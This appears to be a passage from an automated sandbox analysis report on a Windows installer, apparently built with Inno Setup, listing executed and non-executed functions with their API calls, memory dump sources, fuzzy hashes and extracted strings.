                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,005C55CA,?,00000000,00000000,?,005C561A,00000000,0060BBD5,00000000,0060BBF6,?,00000000,00000000,00000000), ref: 005C55AD
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: e93b562a759e66bd38da0de11055e6c017c6201b016aab2ebf39318819426300
                                                                                    • Instruction ID: a8011987c62d8bbf1b65cfa24b3062553c79dfa79d40fcaab4f28f3b38eec933
                                                                                    • Opcode Fuzzy Hash: e93b562a759e66bd38da0de11055e6c017c6201b016aab2ebf39318819426300
                                                                                    • Instruction Fuzzy Hash: 19E09231344704AFD701EAF2CC92E5DBBADE749700BA108B9F400E7641E678AE408558
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040D754, Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(?,?,0000020A), ref: 0040D772
                                                                                      • Part of subcall function 0040E9E0: GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA1C
                                                                                      • Part of subcall function 0040E9E0: LoadLibraryExW.KERNEL32(00000000,00000000,00000002,00000000,?,00000105,00000000,0040EA9A,?,?,00000000), ref: 0040EA6D
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileModuleName$LibraryLoad
                                                                                    • String ID:
                                                                                    • API String ID: 4113206344-0
                                                                                    • Opcode ID: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                                    • Instruction ID: e6e9750417710ce6057aade1326652b07051d0f0da16d230474427610a1a2044
                                                                                    • Opcode Fuzzy Hash: 0c4338d5c56e5e7d061b7f443bbaa86d882c427cb1541d3f25e0c99049ab022e
                                                                                    • Instruction Fuzzy Hash: 6EE0C9B1A013109BCB10DE98C8C5A577794AF08754F044AA6ED64DF386D375D9248BD5
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C5620, Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,?,0060BE09,00000000,0060BE22,?,?,00000000), ref: 005C562B
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: d03a573201fb9b0cdfea091783fb35ce32931a896a6b2078e9e32ab2ad42dd54
                                                                                    • Instruction ID: 1dd340722b5d2e1c7f6fd742ac5f6a0627fbc3f81dbe6857a6f1813bcaa5320a
                                                                                    • Opcode Fuzzy Hash: d03a573201fb9b0cdfea091783fb35ce32931a896a6b2078e9e32ab2ad42dd54
                                                                                    • Instruction Fuzzy Hash: 49D080A0241A000DDE2499FD0CCDF5905845F45775FA41B6EFB64D11E2F739ECD31028
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 005C55D8, Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,005CC453,00000000), ref: 005C55E3
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    • Opcode ID: abae256f38c62cea3cb366abebd9f15dae453fea92c2924580d2950efdc0a250
                                                                                    • Instruction ID: f244ca52905a2ca0d7e8f8dae3113ac9f84fcdd46d4f5ac2ce178984a170c16f
                                                                                    • Opcode Fuzzy Hash: abae256f38c62cea3cb366abebd9f15dae453fea92c2924580d2950efdc0a250
                                                                                    • Instruction Fuzzy Hash: 41C08CB5241A000A9E10A5FE1CC9E5E06885A0933A3240B7EF428E22D3E229E8932018
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006AB828, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(00000000,006B7594,00000000,006B75A3,?,?,?,?,?,006B8087), ref: 006AB83E
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 3664257935-0
                                                                                    • Opcode ID: 6758e0e88d57d95208d96a0f93d89dc0c23ed9957f011aedbea76a8abd3591d3
                                                                                    • Instruction ID: 5844eadd80105d2e42a7600cd3cf7755a0515bcc5506321b481997a7c00cba5d
                                                                                    • Opcode Fuzzy Hash: 6758e0e88d57d95208d96a0f93d89dc0c23ed9957f011aedbea76a8abd3591d3
                                                                                    • Instruction Fuzzy Hash: 4BC0E971D125A0CEC748AB78B9056513BE6E708306B44252BE006C6565D7344441FB01
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0042B89B, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SetErrorMode.KERNEL32(?,0042B8B9), ref: 0042B8AC
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: ErrorMode
                                                                                    • String ID:
                                                                                    • API String ID: 2340568224-0
                                                                                    • Opcode ID: 47be76df901b706332e82315827ab564c907f61500e99d3db6c4ca40acd98452
                                                                                    • Instruction ID: ef9e139676d678b46c4a1b97fc79adffdf8f2034590dff84815287bca9bfeada
                                                                                    • Opcode Fuzzy Hash: 47be76df901b706332e82315827ab564c907f61500e99d3db6c4ca40acd98452
                                                                                    • Instruction Fuzzy Hash: 09B09B76F0C2005DB705B6E5741155C63D8D7C47103E144A7F104C2541D57C5440465C
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004103B4, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 31276548-0
                                                                                    • Opcode ID: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                                                    • Instruction ID: dd27519167a78a1d4504dc33fea54df0b767f1302367e86ea931617165e635a5
                                                                                    • Opcode Fuzzy Hash: 824204c416b5721b5c5076045aab759d5d6ea889ca6f9a5639c93ededeac691c
                                                                                    • Instruction Fuzzy Hash: FAA012144089000ACC04F7194C4340B35905D40114FC40668745CA92C3E61985644ADB
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 00478454, Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,006D52F4,00000000,00000000,?,0047868B,00000000,00000B06,00000000,?,00000000,00000000,00000000), ref: 00478472
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: de729ddde1ab35689ebcf33e75b4741765b06252e55050244c733b99a5348007
                                                                                    • Instruction ID: ab27ebc95461ba232bf13c55df377a678303af6bdd926863771c3d858f146c26
                                                                                    • Opcode Fuzzy Hash: de729ddde1ab35689ebcf33e75b4741765b06252e55050244c733b99a5348007
                                                                                    • Instruction Fuzzy Hash: B5111C746403169BD720DF19C881B82F7E5EF88354F14C53AE9588B385E7B4E904CBA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 004056E8, Relevance: 1.3, APIs: 1, Instructions: 41memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,000001A3,00405CFF,000000FF,004062A4,00000000,0040F3A7,00000000,0040F8B5,00000000,0040FB77,00000000), ref: 004056FF
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: 372fdb11d68696d0a9504d5671ad1f35a7de9a6c0df944fae13850880d11afbd
                                                                                    • Instruction ID: 40859592abdda3e3096ffbba1f4dd7bba12a73507ad120b9e5aa9eaa2caa55c8
                                                                                    • Opcode Fuzzy Hash: 372fdb11d68696d0a9504d5671ad1f35a7de9a6c0df944fae13850880d11afbd
                                                                                    • Instruction Fuzzy Hash: DEF0AFF2B003114FD7149FB89D40B127BE6F708354F10413EE909EB794D7B588008B88
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    Function 00625580, Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 006255E8
                                                                                    • QueryPerformanceCounter.KERNEL32(00000000,00000000,0062587B,?,?,00000000,00000000,?,0062627A,?,00000000,00000000), ref: 006255F1
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 006255FB
                                                                                    • GetCurrentProcessId.KERNEL32(?,00000000,00000000,0062587B,?,?,00000000,00000000,?,0062627A,?,00000000,00000000), ref: 00625604
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0062567A
                                                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00625688
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,006CC098,00000003,00000000,00000000,00000000,00625837,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 006256D0
                                                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,00625826,?,00000000,C0000000,00000000,006CC098,00000003,00000000,00000000,00000000,00625837), ref: 00625709
                                                                                      • Part of subcall function 005C61D8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C61EB
                                                                                    • CreateProcessW.KERNEL32 ref: 006257B2
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 006257E8
                                                                                    • CloseHandle.KERNEL32(000000FF,0062582D,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00625820
                                                                                      • Part of subcall function 0060C7E4: GetLastError.KERNEL32(00000000,0060D50A,00000005,00000000,0060D532,?,?,006D479C,?,00000000,00000000,00000000,?,006B79CB,00000000,006B79E6), ref: 0060C7E7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                    • API String ID: 770386003-3271284199
                                                                                    • Opcode ID: 738d2ede0a9260560286a20ade2739abfd9fc8443701c458b985eab0762e8650
                                                                                    • Instruction ID: dc9605a8fa85faa7e26666280e38f4bb9eef289f9d475eb09267a792e8d1a7e6
                                                                                    • Opcode Fuzzy Hash: 738d2ede0a9260560286a20ade2739abfd9fc8443701c458b985eab0762e8650
                                                                                    • Instruction Fuzzy Hash: 2071A070E00B589EDB20DFA9DC46B9EBBF5EB09304F5041AAF509EB282D7749940CF65
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 006A4AF0, Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 006A490C: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 006A4938
                                                                                      • Part of subcall function 006A490C: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A4951
                                                                                      • Part of subcall function 006A490C: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 006A497B
                                                                                      • Part of subcall function 006A490C: CloseHandle.KERNEL32(00000000), ref: 006A4999
                                                                                      • Part of subcall function 006A4A1C: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,006A4AAD,?,00000097,00000000,?,006A4B27,00000000,006A4C3F,?,?,00000001), ref: 006A4A4B
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 006A4B77
                                                                                    • GetLastError.KERNEL32(0000003C,00000000,006A4C3F,?,?,00000001), ref: 006A4B80
                                                                                    • MsgWaitForMultipleObjects.USER32 ref: 006A4BCD
                                                                                    • GetExitCodeProcess.KERNEL32 ref: 006A4BF3
                                                                                    • CloseHandle.KERNEL32(00000000,006A4C24,00000000,00000000,000000FF,000004FF,00000000,006A4C1D,?,0000003C,00000000,006A4C3F,?,?,00000001), ref: 006A4C17
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                    • API String ID: 254331816-221126205
                                                                                    • Opcode ID: 6da69c68fe0a5308f9ad24966737457fe4054adae9990768cb9dc3eb1a737f07
                                                                                    • Instruction ID: af08106467425c78c69e3bcdac59d2dec0135d8603cf53517b0e3d9c80496904
                                                                                    • Opcode Fuzzy Hash: 6da69c68fe0a5308f9ad24966737457fe4054adae9990768cb9dc3eb1a737f07
                                                                                    • Instruction Fuzzy Hash: C0318470A01208AFDB10FFE9CC82A9DB6A5EF8A314F500579F514E7281DBB49D408F69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Function 0040E0D4, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,0041CF88,?,?), ref: 0040E0F1
                                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040E102
                                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041CF88,?,?), ref: 0040E202
                                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,0041CF88,?,?), ref: 0040E214
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041CF88,?,?), ref: 0040E220
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041CF88,?,?), ref: 0040E265
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000B.00000002.438263058.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000B.00000002.438244996.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438907883.00000000006C4000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438933705.00000000006C9000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438951979.00000000006CB000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438975304.00000000006CD000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.438991508.00000000006CE000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439023225.00000000006D3000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439043432.00000000006D8000.00000008.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439061089.00000000006DA000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439075992.00000000006DB000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 0000000B.00000002.439093664.00000000006DD000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
